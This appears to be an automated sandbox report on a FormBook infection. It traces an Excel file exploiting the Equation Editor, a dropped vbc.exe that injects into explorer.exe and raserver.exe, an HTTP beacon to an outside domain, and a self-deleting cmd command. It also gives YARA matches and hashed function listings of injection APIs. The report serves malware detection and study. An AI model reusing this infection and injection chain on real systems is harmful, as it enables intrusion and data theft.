                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.2.224916934.98.99.3080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Sep 15, 2021 11:43:39.279041052 CEST570OUTGET /r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.boxtobookshelf.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Sep 15, 2021 11:43:39.395982027 CEST570INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 15 Sep 2021 09:43:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "6139efab-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: EXCEL.EXE PID: 1256 Parent PID: 596

                                              General

                                              Start time:11:41:21
                                              Start date:15/09/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13f120000
                                              File size:28253536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: EQNEDT32.EXE PID: 2916 Parent PID: 596

                                              General

                                              Start time:11:41:45
                                              Start date:15/09/2021
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: vbc.exe PID: 2028 Parent PID: 2916

                                              General

                                              Start time:11:41:48
                                              Start date:15/09/2021
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\vbc.exe'
                                              Imagebase:0x330000
                                              File size:538624 bytes
                                              MD5 hash:A3F424F32B637CB917E6596FAE56E401
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: vbc.exe PID: 1292 Parent PID: 2028

                                              General

                                              Start time:11:41:50
                                              Start date:15/09/2021
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\vbc.exe
                                              Imagebase:0x330000
                                              File size:538624 bytes
                                              MD5 hash:A3F424F32B637CB917E6596FAE56E401
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: explorer.exe PID: 1764 Parent PID: 1292

                                              General

                                              Start time:11:41:53
                                              Start date:15/09/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: raserver.exe PID: 2920 Parent PID: 1764

                                              General

                                              Start time:11:42:05
                                              Start date:15/09/2021
                                              Path:C:\Windows\SysWOW64\raserver.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\raserver.exe
                                              Imagebase:0x7c0000
                                              File size:101888 bytes
                                              MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: cmd.exe PID: 3044 Parent PID: 2920

                                              General

                                              Start time:11:42:12
                                              Start date:15/09/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\Public\vbc.exe'
                                              Imagebase:0x4a410000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Analysis Process: vbc.exe PID: 2028 Parent PID: 2916 vbc.exeCOMMON

                                                Executed Functions

                                                Function 001D5C60, Relevance: 2.9, Strings: 2, Instructions: 361COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: )'=*$VGAr
                                                • API String ID: 0-2901443952
                                                • Opcode ID: bbb770c1ce44261277bd8a3d3de9c2a0fa1a61a7ea34cbaf826794843e9bc794
                                                • Instruction ID: 1b77ea2a857e0bb106ceb7e8d4e8eafe76b93ed8d58520b225b47a06b6557b80
                                                • Opcode Fuzzy Hash: bbb770c1ce44261277bd8a3d3de9c2a0fa1a61a7ea34cbaf826794843e9bc794
                                                • Instruction Fuzzy Hash: 6FE1D1B4D14A45CFCB08CFA5D4848AEFBB2FF95300B61855AC401AB356D734EA46CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D5D50, Relevance: 2.8, Strings: 2, Instructions: 296COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: VGAr$VGAr
                                                • API String ID: 0-2551453962
                                                • Opcode ID: 61d6c066ef98bd28d363e7e6643dd7b5444437b5157112d022dcb82c667d9510
                                                • Instruction ID: 51b376f953ed87712de0f052e311a56aab04128f550ba98c78ba594947c68899
                                                • Opcode Fuzzy Hash: 61d6c066ef98bd28d363e7e6643dd7b5444437b5157112d022dcb82c667d9510
                                                • Instruction Fuzzy Hash: 1AD14A70D0460ACFCB48CF95D5848AEFBB2FF89300B25855AD516AB315D734EA82CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D1700, Relevance: 2.8, Strings: 2, Instructions: 255COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: <),($r5`
                                                • API String ID: 0-4244084516
                                                • Opcode ID: b7bce5827ea147f0dd81fec88959cbcd308743e0e074b416b3449cc96b53de0d
                                                • Instruction ID: a596817c9404f5405c4775fc7bf7839b39b4358ee1610be77078d83030dc76a9
                                                • Opcode Fuzzy Hash: b7bce5827ea147f0dd81fec88959cbcd308743e0e074b416b3449cc96b53de0d
                                                • Instruction Fuzzy Hash: 9DB10771D05219EFDB28CFA5C9816DEFBB2FF89300F24946AD409AB364D7349A468F50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D1121, Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: Q%p.$tsA
                                                • API String ID: 0-624219625
                                                • Opcode ID: 335d6e47fbee40728704ee1161542b291d043ecb6d01141bfce7c53e24d72d60
                                                • Instruction ID: cabc00928e3ddd07ccef910d09071a45605e79e97862df87d5b6a250ed5dee57
                                                • Opcode Fuzzy Hash: 335d6e47fbee40728704ee1161542b291d043ecb6d01141bfce7c53e24d72d60
                                                • Instruction Fuzzy Hash: 9C71F374E15218EFCB48CFA9D94099EBBF2FF89310F10846AE509AB365DB349941CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D4488, Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: &LP$/Pc^
                                                • API String ID: 0-1156768635
                                                • Opcode ID: ba3e08278741c2eb169d6d21d6037d84facff53440512a9c60de180619a63b7d
                                                • Instruction ID: 956532cd1117e0f60f3e2d4ab1184b9d8a755d09bc4106444c81d3183e02e6ce
                                                • Opcode Fuzzy Hash: ba3e08278741c2eb169d6d21d6037d84facff53440512a9c60de180619a63b7d
                                                • Instruction Fuzzy Hash: 355107B4E052598FCB08CFAAD9446AEFBF2BF89300F25D16AD509A7351D7348A41CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D1B00, Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: C6e:
                                                • API String ID: 0-1451620285
                                                • Opcode ID: 8fc58fe07d76b5feefdfa6c33f30478da5e3cbd8ab92f19dcfd468f2b31cdab2
                                                • Instruction ID: c224320818f3ae1416797504fe409c9b55b7c6ed369fe28826a4e7a5e18336fe
                                                • Opcode Fuzzy Hash: 8fc58fe07d76b5feefdfa6c33f30478da5e3cbd8ab92f19dcfd468f2b31cdab2
                                                • Instruction Fuzzy Hash: 07B13A74E05219ABCB08DFE9C5805AEFBF2BF98310F65C526D409AB359E7349D01CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D009C, Relevance: .4, Instructions: 377COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fcd7734540ec3bebe9d4f164f5c62037ea38d246ec75d5202c9bd91d4be7b6f1
                                                • Instruction ID: 084fe43dda064edd7195d69d4ddec87976f711099d467f515972fd69278bf947
                                                • Opcode Fuzzy Hash: fcd7734540ec3bebe9d4f164f5c62037ea38d246ec75d5202c9bd91d4be7b6f1
                                                • Instruction Fuzzy Hash: D4F1D534A11218CFDB14DFB4C491E9DB7B2FF8A304F1185AAE409AB365DB34A986CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D04EA, Relevance: .4, Instructions: 375COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8dcae7cfbf33f99ac86181caccf43d003033b085419b4fe663fd6e5a177e5de
                                                • Instruction ID: 03e312b474d63f2a0f054e1408e256d6e1aeee58dcee24642d5a9566b763239c
                                                • Opcode Fuzzy Hash: f8dcae7cfbf33f99ac86181caccf43d003033b085419b4fe663fd6e5a177e5de
                                                • Instruction Fuzzy Hash: F3F1D634A11218CFDB14DFB4C491E9DB7B2FF89304F1185A9E409AB365DB34A986CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D3B68, Relevance: .2, Instructions: 244COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a14ff9fa0cc02395c6084b5168a8e1f184c58bfe204b09842d9aa33ea3704ee9
                                                • Instruction ID: c675b90dd840624b52310eda5cef69d6aee97f311eb92e4cadb0f3ec41fe625f
                                                • Opcode Fuzzy Hash: a14ff9fa0cc02395c6084b5168a8e1f184c58bfe204b09842d9aa33ea3704ee9
                                                • Instruction Fuzzy Hash: DDB147B4E092489FCB08CFA9D9906DEBFB2EF89310F14852AC515BB355D7349A06CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D3BF8, Relevance: .2, Instructions: 213COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a8d4f1d617054d1e0b18632228a29fd05d291aca0dae6601f3df70a30f191625
                                                • Instruction ID: 5c2454ff68d1b11ef4c0d17c02dffec893380ff30a9f3b68325393ed775c0f50
                                                • Opcode Fuzzy Hash: a8d4f1d617054d1e0b18632228a29fd05d291aca0dae6601f3df70a30f191625
                                                • Instruction Fuzzy Hash: 9991E3B0E152088FDB08CFA9C9846DEFBB2EF89310F24902AD515BB364D7349A56CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D4EB1, Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 30758b29e8a1e837399e2535514f0c85394f4539c7324b790ef4c882bfaf7e7e
                                                • Instruction ID: e64e91b7df33e577e4e69d8827f5e2399c7dbb7ca433f27743c5a6b5becdd496
                                                • Opcode Fuzzy Hash: 30758b29e8a1e837399e2535514f0c85394f4539c7324b790ef4c882bfaf7e7e
                                                • Instruction Fuzzy Hash: 12211B71E056588FDB18CFAAD8842DEFBB3AFC9310F14C16AD409A72A4DB741A55CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DCE55, Relevance: 1.8, APIs: 1, Instructions: 326processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001DD127
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 08569424298a008078c2c07d8a2d2a55eea791d69bbb26c9c9d46e20e5f55e40
                                                • Instruction ID: 0f4c15bd25c528711f0af81b3781585762b6b069d1654cb0c20b26f5e5ba33ac
                                                • Opcode Fuzzy Hash: 08569424298a008078c2c07d8a2d2a55eea791d69bbb26c9c9d46e20e5f55e40
                                                • Instruction Fuzzy Hash: 6EC12870D042298FCF24DFA4C841BEDBBB1BF49304F0095AAE519B7250DB749A85CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DCE60, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001DD127
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: ed478596679ca746a95ca9e81519d7477186a6e945059fe906119e1afa3218ac
                                                • Instruction ID: 83dd3bdd2d94efe0000297037ae8cb7f5ec52cc5a2443d14371fe69faf0fe212
                                                • Opcode Fuzzy Hash: ed478596679ca746a95ca9e81519d7477186a6e945059fe906119e1afa3218ac
                                                • Instruction Fuzzy Hash: 76C11670D042298FDF24DFA4D841BEEBBB2BF49304F0095AAE519B7240DB749A85CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DCAC0, Relevance: 1.6, APIs: 1, Instructions: 128injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DCB9B
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 90c3cdd4e522d6923d71cb118451aa8d8e3ffdddd60c4b7fefad50ca2526f818
                                                • Instruction ID: 3f54016a2cee70e0f34af49d25a0e7da786f317659d82acc10b5d5835ef65494
                                                • Opcode Fuzzy Hash: 90c3cdd4e522d6923d71cb118451aa8d8e3ffdddd60c4b7fefad50ca2526f818
                                                • Instruction Fuzzy Hash: 6041CDB5D052499FCF00CFA9D884AEEBBB1BB4A304F24942AE815B7250D335AA05CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DCAC8, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DCB9B
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 6fdcf0bfe0052ea6d227a62d73ffb4645b647d85756837a2c1a2d18d359377b0
                                                • Instruction ID: 4bf6d37149108ba3c7db2992339db277c653d16b211a570253b738cf1e2acb9e
                                                • Opcode Fuzzy Hash: 6fdcf0bfe0052ea6d227a62d73ffb4645b647d85756837a2c1a2d18d359377b0
                                                • Instruction Fuzzy Hash: C641A8B5D052599FCF00CFA9D984AEEFBB1BB49304F20942AE815B7210D735AA45CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DC999, Relevance: 1.6, APIs: 1, Instructions: 108memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001DCA4A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 611c3ccfd73b17a3721abc8991885f447c7b1c0f99c6bce37be3c14c9d2ef2a0
                                                • Instruction ID: 7cb15e6ada46f848fc14617af1f4cf625f41a52db27b5bec152d17a387f3e475
                                                • Opcode Fuzzy Hash: 611c3ccfd73b17a3721abc8991885f447c7b1c0f99c6bce37be3c14c9d2ef2a0
                                                • Instruction Fuzzy Hash: 8041BAB5D042589FCF04CFA9D884ADEBBB1BF5A314F10941AE815BB310D735A906CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DCC28, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DCCDA
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: f997d1c46acc621e5a477bd4872f2d470750baba3645b38346dc93a57b242f35
                                                • Instruction ID: a5953bb9f1621fa0b9f948f39ffa31bd18ed57b2bfa3726a6ce6c8e0b43fff04
                                                • Opcode Fuzzy Hash: f997d1c46acc621e5a477bd4872f2d470750baba3645b38346dc93a57b242f35
                                                • Instruction Fuzzy Hash: BE4196B9D042599FCF00CFA9D884AEEFBB1BF49314F10942AE915B7200D775A946CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DC9A0, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001DCA4A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: f5962ceb81d35debe7665a98b822726d66b508fa43c57dd76624aae2ebf33530
                                                • Instruction ID: af08e9f47c08ea8c4ecab06d160489feb379b46261166361604cef216dbb7d48
                                                • Opcode Fuzzy Hash: f5962ceb81d35debe7665a98b822726d66b508fa43c57dd76624aae2ebf33530
                                                • Instruction Fuzzy Hash: 1B4188B4D042589BCF14CFA9D884A9EBBB1BB49314F10942AE815B7310D735A906CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DC870, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 001DC91F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 1616859cff092608114432c2e0f000606aaf557febdfcc6d470816f653f2b31e
                                                • Instruction ID: 00a87be0f828658ca9549c7ffac57ee664127ca5cd5783fae35cc2909e383b63
                                                • Opcode Fuzzy Hash: 1616859cff092608114432c2e0f000606aaf557febdfcc6d470816f653f2b31e
                                                • Instruction Fuzzy Hash: E141BCB4D042589FCB14CFA9D884AEEFBB1BF49314F14842AE415B7340D739A945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DBAF8, Relevance: 1.6, APIs: 1, Instructions: 79threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 001DBB7E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 9691d50dc46ce773b929d5b4690f356eb560d71cf4a62a608ae0e5ccb389f325
                                                • Instruction ID: 6a6d1fadca7c86b7a6dfbcc1216b02487a5abc10a49d5afd6525d5e8e1432d8e
                                                • Opcode Fuzzy Hash: 9691d50dc46ce773b929d5b4690f356eb560d71cf4a62a608ae0e5ccb389f325
